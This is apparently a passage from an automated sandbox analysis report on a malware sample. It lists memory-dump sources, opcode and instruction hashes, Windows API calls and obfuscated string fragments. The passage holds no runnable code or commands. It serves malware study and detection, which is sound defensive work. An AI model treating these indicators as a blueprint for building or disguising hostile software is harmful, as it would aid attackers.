                                                                                                          • Opcode Fuzzy Hash: 06092fb294515c55c5d4a3f5c3932efb0bbda3695c8d00682d9ae413fd06b1e2
                                                                                                          • Instruction Fuzzy Hash: 4AA12FB06083109FD310DF25E88162BBBE1FFC2719F45492DE9C58B351E7B89906CB96
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: %21&$7k2?
                                                                                                          • API String ID: 2994545307-1884281822
                                                                                                          • Opcode ID: 930b3360a6efd2680fb2cb1cd70fe06c79fa9c98ee51d43274cc8953844ec839
                                                                                                          • Instruction ID: 5d52432c800cdacfb670e5a342df8ffc1e1d0b16707e1f5283b95985476ea6f9
                                                                                                          • Opcode Fuzzy Hash: 930b3360a6efd2680fb2cb1cd70fe06c79fa9c98ee51d43274cc8953844ec839
                                                                                                          • Instruction Fuzzy Hash: DAB15C727087204BDB18CF24E85267B77A2EB95304F99853EE8468B381E73CDD05C39A
                                                                                                          APIs
                                                                                                          • LdrInitializeThunk.NTDLL(0043CC7B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00439E9E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: cba`
                                                                                                          • API String ID: 2994545307-1926275841
                                                                                                          • Opcode ID: d4a85b7172948f4bea12838c8fcc7bd31e4b987d5751cebc0a3660dd60dd0943
                                                                                                          • Instruction ID: 374a5f874cfd158a3b85d986cfed74ed275997d30767ec8dfa56d2100d753f12
                                                                                                          • Opcode Fuzzy Hash: d4a85b7172948f4bea12838c8fcc7bd31e4b987d5751cebc0a3660dd60dd0943
                                                                                                          • Instruction Fuzzy Hash: 37417975A483049BD7249F65ECC0B7B73A1EBC8714F28463DEA8597390E378EC418299
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: @
                                                                                                          • API String ID: 2994545307-2766056989
                                                                                                          • Opcode ID: 595c4cf52168e1c8f70d594c86d9093254b8886fdfff40591c1cb8232c0caa53
                                                                                                          • Instruction ID: a06c1eee6061ee24535d2978fd3956e2edeaf57007d92e1d03b94cafbaa0f768
                                                                                                          • Opcode Fuzzy Hash: 595c4cf52168e1c8f70d594c86d9093254b8886fdfff40591c1cb8232c0caa53
                                                                                                          • Instruction Fuzzy Hash: EE3144751083088BC324DF18D8C036FBBF4EF89358F15582DEA8587350E3399909CBA6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 0d0f987f95dd01dd346831f2cb683c5db04f0cbef699b3ab79e014dd58f733fa
                                                                                                          • Instruction ID: 2436c842486bb1e96b2bcf13ce04d2d6de09f4c838fc53b8f5828c2c40861213
                                                                                                          • Opcode Fuzzy Hash: 0d0f987f95dd01dd346831f2cb683c5db04f0cbef699b3ab79e014dd58f733fa
                                                                                                          • Instruction Fuzzy Hash: AE514876A083008FD7149E25CC80737F7A2EBD9310F29912EF4D587351DB78AD068B9A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6f1ed21bcde79da64442d463aec10cc3b9dadccd5c46c1a199c4d32b7e0cbcbd
                                                                                                          • Instruction ID: 6a497f2cb0e8c500077d952929dfaf2e0669ff669a4a42970148ee42aef4ed29
                                                                                                          • Opcode Fuzzy Hash: 6f1ed21bcde79da64442d463aec10cc3b9dadccd5c46c1a199c4d32b7e0cbcbd
                                                                                                          • Instruction Fuzzy Hash: C34117796993406BD314DF50CC85B3B73A6E7C6310F29A53DA1D05B3D1DBB89C06871A
                                                                                                          Control-flow Graph
                                                                                                          control_flow_graph 1018 42d0be-42d121 call 43b710 1022 42d130-42d15f 1018->1022 1022->1022 1023 42d161-42d16d 1022->1023 1024 42d18b-42d198 1023->1024 1025 42d16f-42d178 1023->1025 1027 42d19a-42d1a1 1024->1027 1028 42d1bb-42d201 FreeLibrary call 43b710 1024->1028 1026 42d180-42d189 1025->1026 1026->1024 1026->1026 1029 42d1b0-42d1b9 1027->1029 1032 42d204-42d22f 1028->1032 1029->1028 1029->1029 1033 42d230-42d25f 1032->1033 1033->1033 1034 42d261-42d26d 1033->1034 1035 42d28b-42d298 1034->1035 1036 42d26f-42d278 1034->1036 1038 42d29a-42d2a1 1035->1038 1039 42d2bb-42d2dd FreeLibrary 1035->1039 1037 42d280-42d289 1036->1037 1037->1035 1037->1037 1040 42d2b0-42d2b9 1038->1040 1040->1039 1040->1040
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary
                                                                                                          • String ID: ,M
                                                                                                          • API String ID: 3664257935-1887782012
                                                                                                          • Opcode ID: bcae319345e45dec2ad11f2b745a52c673fdef0d70ad5114471494c41ca4e074
                                                                                                          • Instruction ID: 8a9bcac8137a288ba93459f6299049b64f6989e319f8128aa38dd281b9624f43
                                                                                                          • Opcode Fuzzy Hash: bcae319345e45dec2ad11f2b745a52c673fdef0d70ad5114471494c41ca4e074
                                                                                                          • Instruction Fuzzy Hash: 4A4145A09183D08AD3358B25C8907A7BFD1AFE7305F4889ADC5C997342CB794505CB2A
                                                                                                          APIs
                                                                                                          • CoInitializeEx.OLE32(00000000,00000002), ref: 0040E583
                                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E6D0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Initialize
                                                                                                          • String ID:
                                                                                                          • API String ID: 2538663250-0
                                                                                                          • Opcode ID: 4ec4d94ef6079043ec59ec138dd99814ed3f780f987ca9f5ef7e9121435fbe0b
                                                                                                          • Instruction ID: 4164ddfdc88b490302d945ec3b486a8cc48757e120ea965f99e69a823b98332c
                                                                                                          • Opcode Fuzzy Hash: 4ec4d94ef6079043ec59ec138dd99814ed3f780f987ca9f5ef7e9121435fbe0b
                                                                                                          • Instruction Fuzzy Hash: F341F9B4D10B40AFD370EF39CA0B7127EB4AB05210F50472DF9EA86AD4E631A4198BD7
                                                                                                          APIs
                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040E2CD
                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040E2E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeSecurity
                                                                                                          • String ID:
                                                                                                          • API String ID: 640775948-0
                                                                                                          • Opcode ID: 163e2fae047e479bb7b8822df0f7d88409a06025b5b53c93555790a35607bab9
                                                                                                          • Instruction ID: 7dd079ca6c0b00bfe119d2ce5c251a467b928ebdf26a9ec64d4c380262400e15
                                                                                                          • Opcode Fuzzy Hash: 163e2fae047e479bb7b8822df0f7d88409a06025b5b53c93555790a35607bab9
                                                                                                          • Instruction Fuzzy Hash: 79E067343C83517AFA788754EC1BF143615A785F36F744324B3267D2F895E07141860D
                                                                                                          APIs
                                                                                                          • GetForegroundWindow.USER32 ref: 0043A09A
                                                                                                          • GetForegroundWindow.USER32 ref: 0043A0B0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ForegroundWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2020703349-0
                                                                                                          • Opcode ID: 14f5f4c5a4343420db801557d15f6eadcf159b0f551794c97a88a86df3eb745b
                                                                                                          • Instruction ID: 89b964fe84dfd191995a888d2c3ffa47c60ec2d798a22e32195ce22058b22125
                                                                                                          • Opcode Fuzzy Hash: 14f5f4c5a4343420db801557d15f6eadcf159b0f551794c97a88a86df3eb745b
                                                                                                          • Instruction Fuzzy Hash: D4D05EB9911804ABCA049721FC4E42A7626DB4A209715B03BEC0386317DE3594098ACA
                                                                                                          APIs
                                                                                                          • GetUserDefaultUILanguage.KERNELBASE ref: 00434939
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DefaultLanguageUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 95929093-0
                                                                                                          • Opcode ID: 3be5474a19a54549e72ba839cbf42c6c32ad1d2b5223f09665ad6bb43b8c3284
                                                                                                          • Instruction ID: 12104e991fc1a53e7b22025024a683eababe2184b9e8a26e5a41f1d5fedeaa40
                                                                                                          • Opcode Fuzzy Hash: 3be5474a19a54549e72ba839cbf42c6c32ad1d2b5223f09665ad6bb43b8c3284
                                                                                                          • Instruction Fuzzy Hash: D0118B30A056948FCB19CB799D906DCBFF1AF8E311F1842ADD5AAE73D0D6345A018B25
                                                                                                          APIs
                                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,00000000,00000000,?,00000000,0040B633,00000000,00000001), ref: 00439E22
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: 99160e2cfeebd4b64f8057989e7cc1e869e6c857fe7cee9a818ec10a3bd0d788
                                                                                                          • Instruction ID: 08eb5d2289196739d45aa41d563c1dfc5806d12bc2e7e34de5559120fd7a7bad
                                                                                                          • Opcode Fuzzy Hash: 99160e2cfeebd4b64f8057989e7cc1e869e6c857fe7cee9a818ec10a3bd0d788
                                                                                                          • Instruction Fuzzy Hash: FCF0E9BA809B11EFCA105F25BC02A5B7765EFCFB51F02447AF80146112DB79D801C6AE
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BlanketProxy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3890896728-0
                                                                                                          • Opcode ID: f9ddf4903803a66d5f46f6440834eb16b94f5d8e53697827fd9981f27561a418
                                                                                                          • Instruction ID: ba06c54068975d59ddc1d4b41db5d6714b927070dfb3565dd83874e0ed78d376
                                                                                                          • Opcode Fuzzy Hash: f9ddf4903803a66d5f46f6440834eb16b94f5d8e53697827fd9981f27561a418
                                                                                                          • Instruction Fuzzy Hash: 33F054B46097019FE354DF28D5A875ABBE0FF85308F118D1DE4AA8B391C7B5A548CF82
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BlanketProxy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3890896728-0
                                                                                                          • Opcode ID: 8c10bff20a8e8aed65d451a0f9309ae2e9a1c40bdddee781e7a4077f99872b17
                                                                                                          • Instruction ID: ed94d594bd2117d806c89197c83c39404e0237149115b004bcc3b795553b0392
                                                                                                          • Opcode Fuzzy Hash: 8c10bff20a8e8aed65d451a0f9309ae2e9a1c40bdddee781e7a4077f99872b17
                                                                                                          • Instruction Fuzzy Hash: 84F0DAB45093018FD704DF24C1A9716BBE0FF89304F00491CE4958B3A0C7759548CF82
                                                                                                          APIs
                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,00000000,00411FA0), ref: 00438740
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 3298025750-0
                                                                                                          • Opcode ID: c98e3c6c1c5d3e406042c1eac254c2d99449c441fdb6da50f35b40cfef612574
                                                                                                          • Instruction ID: b25b88e9ea7bdbb1f89850581c3ffb4b409410ec0811aa88fdf87babea11d3c6
                                                                                                          • Opcode Fuzzy Hash: c98e3c6c1c5d3e406042c1eac254c2d99449c441fdb6da50f35b40cfef612574
                                                                                                          • Instruction Fuzzy Hash: FCD0A932014422EBCA002F18BC06BCB3B54EF4A320F0708A2B0006A061C3249C818AD8
                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000,?,?,0041A117,00000000), ref: 00438710
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: 301484ee77c7189e8139e2f79f4fd3c60f6cf26ded677418877e97f4349c52e3
                                                                                                          • Instruction ID: 7f650c09d4f92c4d2e9c2dea1ed3a35c06b5e631d61445baefa380d687e4b5b8
                                                                                                          • Opcode Fuzzy Hash: 301484ee77c7189e8139e2f79f4fd3c60f6cf26ded677418877e97f4349c52e3
                                                                                                          • Instruction Fuzzy Hash: 63C09B31445120BFC9102B15FC0AFCB3F94DF55361F0100A5B10467071C7606C86C6DC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: %B!D$(N3@$,J=L$@"_$$E*w,$EF$M:D<$O>^0$R.L $V2V4$Y6KH
                                                                                                          • API String ID: 0-989434418
                                                                                                          • Opcode ID: 08d5ecb659e1ecc1645d5db6a69494dc162f3c250b2ae45938d190f06ebd4042
                                                                                                          • Instruction ID: b8e7b53849075f0b5c8fb42915ac1224b2bdd734c57739fab395032b8c210db6
• Opcode Fuzzy Hash: 08d5ecb659e1ecc1645d5db6a69494dc162f3c250b2ae45938d190f06ebd4042
• Instruction Fuzzy Hash: 5DD1FC7060D3208BC714DF65D88122BB7F2EFE2314F549A2DE8954B3A1EB79D901C75A

Strings
Memory Dump Source
• Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_external.jbxd
Similarity
• API ID:
• String ID: (+5=$5`ab$5`ab$MN$O~$kl$pK$q{
• API String ID: 0-703746868
• Opcode ID: ebc0d979a2bb7c6e76a913110c66c05739548f11b644ccfc290ab05abd6cf70e
• Instruction ID: e95a3a19861d8666fc895b8d31042dca6cd5972a112fb2dd02ec6905db7163ff
• Opcode Fuzzy Hash: ebc0d979a2bb7c6e76a913110c66c05739548f11b644ccfc290ab05abd6cf70e
• Instruction Fuzzy Hash: 1402227654C3118FD300DFA5D8916ABFBE2EFD6314F08882DE8D547381E2B89945CB9A

Strings
Memory Dump Source
• Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_external.jbxd
Similarity
• API ID:
• String ID: -X[i$7$D$O$P<?$gfff$tu
• API String ID: 0-1455771666
• Opcode ID: 15801b1b37ee951290fcf3f24f268a347267c4ddf2ea294502b6e9477135b93d
• Instruction ID: f86d005fccabec52c28f4c5979689c87f8aec17e8d7c074fead4d4dd86c6c749
• Opcode Fuzzy Hash: 15801b1b37ee951290fcf3f24f268a347267c4ddf2ea294502b6e9477135b93d
• Instruction Fuzzy Hash: 6182447160C3408BD724CF24C8517ABBBE2EF96304F19896EE4C59B391D77C8946CB9A

APIs
  • Part of subcall function 00439E70: LdrInitializeThunk.NTDLL(0043CC7B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00439E9E
• FreeLibrary.KERNEL32(?), ref: 00419EBA
• FreeLibrary.KERNEL32(?), ref: 00419F5B
Strings
Memory Dump Source
• Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_external.jbxd
Similarity
• API ID: FreeLibrary$InitializeThunk
• String ID: FG$CE
• API String ID: 764372645-3557296681
• Opcode ID: f35092a33cc0789979ebe9ffe0442ab9e9dfaf3093cef2044949eb2315b9da50
• Instruction ID: 751b9072336dd476f0c8edbb4e61040a9f350fdfcd91b674c5d84effa823867d
• Opcode Fuzzy Hash: f35092a33cc0789979ebe9ffe0442ab9e9dfaf3093cef2044949eb2315b9da50
• Instruction Fuzzy Hash: FC92437560D3406BE7209F248C907ABBBE2ABE5304F19882EE4C587391D67CDD86C75A

Strings
Memory Dump Source
• Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_external.jbxd
Similarity
• API ID:
• String ID: ,Y$V,$Z[$^E$rPB$pqr
• API String ID: 0-2372777551
• Opcode ID: 913fdea2594e1da4b810cf9db394a3c049926d6ae93661e710300a5f79a234bc
• Instruction ID: 360cfbd36ec33d51b6af844590a16ff09060c3b1c32a77853cdd739021ba3ac8
• Opcode Fuzzy Hash: 913fdea2594e1da4b810cf9db394a3c049926d6ae93661e710300a5f79a234bc
• Instruction Fuzzy Hash: D7E1F1B4608340DFE7209F15D88176BBBF0FB96304F50592DF589572A2D734990ACF4A

Strings
Memory Dump Source
• Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_external.jbxd
Similarity
• API ID:
• String ID: 2)B$r(B$&B$(
• API String ID: 0-1810555459
• Opcode ID: 4f2308844809a7590283147f67298dd7f81f45e8c2d3365a79e187a7dc1c49d0
• Instruction ID: 9563589593f9865cb13f29d004e10e0faf829b031538dc110dce0b8b15bb39a5
• Opcode Fuzzy Hash: 4f2308844809a7590283147f67298dd7f81f45e8c2d3365a79e187a7dc1c49d0
• Instruction Fuzzy Hash: 12320F75A04225DFDB18CF28ED507AAB3B1FB4A301F9945BCE806A7390D778AD41CB58

Strings
Memory Dump Source
• Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_external.jbxd
Similarity
• API ID:
• String ID: EL$GD$WO$]xyz
• API String ID: 0-4149224771
• Opcode ID: 07790e8268b4ef140f5444df08ebed9bb19fc2d323bf9cafdfc37f194dad796f
• Instruction ID: 9a7495fd74d9295db7881ffdbfa432014b958f37bee7e95d90d6cdcd9c91334b
• Opcode Fuzzy Hash: 07790e8268b4ef140f5444df08ebed9bb19fc2d323bf9cafdfc37f194dad796f
• Instruction Fuzzy Hash: AFA125B19483118BD724DF28C8827ABB7F0EF81354F08991EE8D48B390E738D944C79A

Strings
Memory Dump Source
• Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_external.jbxd
Similarity
• API ID:
• String ID: T|B$dgX`$l.ez
• API String ID: 0-868395073
• Opcode ID: 1712a3355b676f828411998725e0f90a9b629ed43c952e07b05eaf22cb065d78
• Instruction ID: 87c6ed98314ab04d272854ffec07c20815345828f08c88737cada0021c4b88b8
• Opcode Fuzzy Hash: 1712a3355b676f828411998725e0f90a9b629ed43c952e07b05eaf22cb065d78
• Instruction Fuzzy Hash: 9FA1547560C3509FD3109F28A88062FB7E6EBD6714F14893DE88597392D378ED06CB9A

Strings
Memory Dump Source
• Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_external.jbxd
Similarity
• API ID:
• String ID: ^D$iM$tz
• API String ID: 0-1308588582
• Opcode ID: 9bf6e2da4fa385771237cf762a4f9fd117a1b81d0b310441d9eb8cc303677817
• Instruction ID: 6cec2f178053dfbaa55c33c692269f3138733c1bf41a8a5e1dffbfa9d16ab5cc
• Opcode Fuzzy Hash: 9bf6e2da4fa385771237cf762a4f9fd117a1b81d0b310441d9eb8cc303677817
• Instruction Fuzzy Hash: 0751BBB064C3409FE310CF51898066BBFE1EB86614F50896DF2D5AB352C3BC990A9B5B

Strings
Memory Dump Source
• Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_external.jbxd
Similarity
• API ID:
• String ID: KL
• API String ID: 0-759073162
• Opcode ID: 528411e470d2afa9db70664954eda8b8b0055ea339f8eec3dfe42437925f919f
• Instruction ID: d17706412ea7e6b64df53950a2d407623bc6698a3bf9af60360d7121314021ab
• Opcode Fuzzy Hash: 528411e470d2afa9db70664954eda8b8b0055ea339f8eec3dfe42437925f919f
• Instruction Fuzzy Hash: FBC14672B043118BD714DB25D882A77B3E6EFE1314F5A842EE885873A1E778E805C75A

Strings
Memory Dump Source
• Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_external.jbxd
Similarity
• API ID:
• String ID: rLMN
• API String ID: 0-1296146032
• Opcode ID: 398a0f2d3e1c1d23b7c6520c3d68cfb8c2b6022d5b9c1086113ae940e227c2de
• Instruction ID: 2876e3fa5c5fea4cdcd8359107f6886036ead6598efc9e460f40ff23830ad6b3
• Opcode Fuzzy Hash: 398a0f2d3e1c1d23b7c6520c3d68cfb8c2b6022d5b9c1086113ae940e227c2de
• Instruction Fuzzy Hash: D2815C72E086254BC7109E25CA4025BB7D69FC1710F1A867ECCD5BB3E5E939DC0687C9

Strings
Memory Dump Source
• Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_external.jbxd
Similarity
• API ID:
• String ID: 4
• API String ID: 0-4088798008
• Opcode ID: d43090eb1eb790dcf99edd84306fabfed71062697cf21703b4617283169f80a8
• Instruction ID: 4b2083256ab3a1a0e9e21fef50c66cb8c5486d342f26eeda273b5b13c4af68cc
• Opcode Fuzzy Hash: d43090eb1eb790dcf99edd84306fabfed71062697cf21703b4617283169f80a8
• Instruction Fuzzy Hash: B751E034A09791CFD7048F35A4A076AFBE2EB8A310F4D95ADD1D48B792CB389805DB48

Strings
Memory Dump Source
• Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_external.jbxd
Similarity
• API ID:
• String ID: ;~B
• API String ID: 0-4262569895
• Opcode ID: 642ea87153a8a3c7abee51d2da7421e409e98fd215c6f751a06a0f979853ef99
• Instruction ID: 538cb129e17d69a09c87856b3a8c8df6b57b1ee5a985df3ca3184c8bef2424f6
• Opcode Fuzzy Hash: 642ea87153a8a3c7abee51d2da7421e409e98fd215c6f751a06a0f979853ef99
• Instruction Fuzzy Hash: 5C510176A0A620DBC310DF24D84152BB3E2EF85715F45492DE8D5A7361EB399C10CB9A

Strings
Memory Dump Source
• Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_external.jbxd
Similarity
• API ID:
• String ID: <<9>
• API String ID: 0-2032997600
• Opcode ID: 400242b7250ea6857ae17296f1bc71d46b1b7a2624dffe66e82ff335fa2fa009
• Instruction ID: 453fe435397c730477111571020fa32af83de982021730ce0f75d12a03b73b55
• Opcode Fuzzy Hash: 400242b7250ea6857ae17296f1bc71d46b1b7a2624dffe66e82ff335fa2fa009
• Instruction Fuzzy Hash: 304114A56083E08BE3318F2994A07B7BFE1EFA7304F28585EDAC647242D2760455C75B

Strings
Memory Dump Source
• Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_external.jbxd
Similarity
• API ID: InitializeThunk
• String ID: cba`
• API String ID: 2994545307-1926275841
• Opcode ID: 9390a4e8fa3ac4350d87eb731825ce49587e53a81ed70f59367afe891bca62da
• Instruction ID: 99072d10a19c65d2e344c474e3a8c7b25912beff4e5135e1856b4e4fc888a3a8
• Opcode Fuzzy Hash: 9390a4e8fa3ac4350d87eb731825ce49587e53a81ed70f59367afe891bca62da
• Instruction Fuzzy Hash: 1E416B75A493049BD3148F25ECC1B7FB3A5EB8C704F28113DEA8697390D2789C11C69A

Memory Dump Source
• Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_external.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 92ea9aa079de7fb9bd51e09e57d1fcde5d50bc4bbef5ffc2488bdc77a794a51a
